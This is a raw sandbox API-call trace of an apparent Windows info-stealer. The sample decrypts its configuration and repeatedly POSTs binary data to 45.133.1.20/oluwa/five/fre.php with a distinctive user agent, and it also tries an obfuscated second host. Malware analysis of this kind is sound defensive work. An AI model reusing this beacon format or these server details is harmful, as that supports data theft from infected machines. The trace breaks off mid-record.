[0253.642] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.642] GetProcessHeap () returned 0x6a0000 [0253.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0253.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.646] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0253.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.647] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0253.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.648] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0253.648] GetProcessHeap () returned 0x6a0000 [0253.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0253.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.651] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0253.652] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.653] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0253.653] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.656] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0253.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.658] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0253.658] GetProcessHeap () returned 0x6a0000 [0253.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0253.658] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0253.658] GetProcessHeap () returned 0x6a0000 [0253.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0253.658] socket (af=2, type=1, protocol=6) returned 0x870 [0253.658] connect (s=0x870, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0253.685] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0253.685] GetProcessHeap () returned 0x6a0000 [0253.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0253.685] GetProcessHeap () returned 0x6a0000 [0253.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0253.687] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0253.688] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0253.688] GetProcessHeap () returned 0x6a0000 [0253.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db288 [0253.688] GetProcessHeap () returned 0x6a0000 [0253.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0253.689] GetProcessHeap () returned 0x6a0000 [0253.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0253.689] GetProcessHeap () returned 0x6a0000 [0253.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0253.690] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0253.691] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0253.691] GetProcessHeap () returned 0x6a0000 [0253.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0253.691] GetProcessHeap () returned 0x6a0000 [0253.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0253.692] send (s=0x870, buf=0x6bd460*, len=242, flags=0) returned 242 [0253.692] send (s=0x870, buf=0x6bb998*, len=159, flags=0) returned 159 [0253.693] GetProcessHeap () returned 0x6a0000 [0253.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0253.693] recv (in: s=0x870, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0253.783] GetProcessHeap () returned 0x6a0000 [0253.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0253.784] GetProcessHeap () returned 0x6a0000 [0253.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0253.784] GetProcessHeap () returned 0x6a0000 [0253.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db288 | out: hHeap=0x6a0000) returned 1 [0253.785] GetProcessHeap () returned 0x6a0000 [0253.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0253.785] closesocket (s=0x870) returned 0 [0253.786] GetProcessHeap () returned 0x6a0000 [0253.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0253.786] GetProcessHeap () returned 0x6a0000 [0253.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0253.786] GetProcessHeap () returned 0x6a0000 [0253.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0253.787] GetProcessHeap () returned 0x6a0000 [0253.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0253.787] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15a0) returned 0x870 [0253.790] Sleep (dwMilliseconds=0xea60) [0253.809] GetProcessHeap () returned 0x6a0000 [0253.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0253.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.811] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.821] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0253.832] GetProcessHeap () returned 0x6a0000 [0253.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0253.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.834] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0253.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.852] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.853] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.854] GetProcessHeap () returned 0x6a0000 [0253.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0253.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.855] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0253.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.856] CryptDestroyKey (hKey=0x6ad020) returned 1 [0253.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.857] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0253.858] GetProcessHeap () returned 0x6a0000 [0253.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0253.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.859] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0253.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.860] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0253.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.861] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0253.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.863] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0253.863] GetProcessHeap () returned 0x6a0000 [0253.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0253.863] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0253.863] GetProcessHeap () returned 0x6a0000 [0253.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0253.864] GetProcessHeap () returned 0x6a0000 [0253.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0253.864] GetProcessHeap () returned 0x6a0000 [0253.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0253.865] GetProcessHeap () returned 0x6a0000 [0253.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0253.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.866] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.875] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0253.886] GetProcessHeap () returned 0x6a0000 [0253.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0253.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.887] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0253.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.888] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.890] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.890] GetProcessHeap () returned 0x6a0000 [0253.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0253.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.892] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0253.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.895] CryptDestroyKey (hKey=0x6ad020) returned 1 [0253.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.896] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0253.896] GetProcessHeap () returned 0x6a0000 [0253.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0253.897] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.898] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0253.898] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.899] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0253.900] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.900] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0253.901] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.901] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0253.901] GetProcessHeap () returned 0x6a0000 [0253.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0253.902] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0253.902] GetProcessHeap () returned 0x6a0000 [0253.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0253.902] socket (af=2, type=1, protocol=6) returned 0x874 [0253.902] connect (s=0x874, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0253.926] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0253.926] GetProcessHeap () returned 0x6a0000 [0253.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0253.927] GetProcessHeap () returned 0x6a0000 [0253.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0253.927] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0253.928] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0253.928] GetProcessHeap () returned 0x6a0000 [0253.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da8c8 [0253.928] GetProcessHeap () returned 0x6a0000 [0253.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0253.930] GetProcessHeap () returned 0x6a0000 [0253.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0253.931] GetProcessHeap () returned 0x6a0000 [0253.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0253.932] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0253.932] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0253.933] GetProcessHeap () returned 0x6a0000 [0253.933] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0253.933] GetProcessHeap () returned 0x6a0000 [0253.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0253.934] send (s=0x874, buf=0x6bd460*, len=242, flags=0) returned 242 [0253.935] send (s=0x874, buf=0x6bb998*, len=159, flags=0) returned 159 [0253.935] GetProcessHeap () returned 0x6a0000 [0253.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0253.935] recv (in: s=0x874, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0254.040] GetProcessHeap () returned 0x6a0000 [0254.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0254.041] GetProcessHeap () returned 0x6a0000 [0254.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0254.041] GetProcessHeap () returned 0x6a0000 [0254.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da8c8 | out: hHeap=0x6a0000) returned 1 [0254.042] GetProcessHeap () returned 0x6a0000 [0254.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0254.042] closesocket (s=0x874) returned 0 [0254.043] GetProcessHeap () returned 0x6a0000 [0254.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0254.043] GetProcessHeap () returned 0x6a0000 [0254.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0254.043] GetProcessHeap () returned 0x6a0000 [0254.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0254.044] GetProcessHeap () returned 0x6a0000 [0254.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0254.044] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15a4) returned 0x874 [0254.048] Sleep (dwMilliseconds=0xea60) [0254.051] GetProcessHeap () returned 0x6a0000 [0254.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0254.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.052] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0254.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.062] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0254.070] GetProcessHeap () returned 0x6a0000 [0254.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0254.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.072] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0254.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.073] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0254.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.074] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.074] GetProcessHeap () returned 0x6a0000 [0254.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0254.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.076] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0254.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.077] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0254.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.078] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0254.078] GetProcessHeap () returned 0x6a0000 [0254.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0254.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.079] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0254.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.080] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0254.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.102] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0254.102] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.105] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0254.105] GetProcessHeap () returned 0x6a0000 [0254.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0254.105] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0254.105] GetProcessHeap () returned 0x6a0000 [0254.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0254.105] GetProcessHeap () returned 0x6a0000 [0254.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0254.106] GetProcessHeap () returned 0x6a0000 [0254.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0254.106] GetProcessHeap () returned 0x6a0000 [0254.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0254.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.107] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0254.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.114] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0254.120] GetProcessHeap () returned 0x6a0000 [0254.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0254.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.121] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0254.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.122] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0254.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.176] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.177] GetProcessHeap () returned 0x6a0000 [0254.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0254.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.178] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0254.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.187] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0254.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.188] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0254.188] GetProcessHeap () returned 0x6a0000 [0254.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 